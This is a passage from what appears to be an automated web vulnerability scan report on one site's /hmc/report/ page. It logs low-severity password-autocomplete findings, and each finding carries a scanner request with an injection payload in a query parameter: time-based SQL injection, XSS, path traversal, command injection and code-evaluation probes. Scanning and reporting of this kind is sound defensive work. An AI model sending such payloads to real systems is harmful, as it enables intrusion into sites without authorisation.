The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.104. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.105. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.106. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.107. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.108. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.109. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.110. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=*/netsparker(0x000047)%3B/* HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=*/netsparker(0x000047)%3b/*" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.111. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.112. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%22%20ns=%20netsparker(0x000015)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x000015)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.113. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.114. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.115. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3Cscript%3Ens(0x000038)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000038)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.116. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.117. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.118. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%20ns=netsparker(0x00001A)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%20ns=netsparker(0x00001A)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.119. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=//netsparker.com/n/n.css?0x000020 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x000020" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.120. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.121. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2Bresponse.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
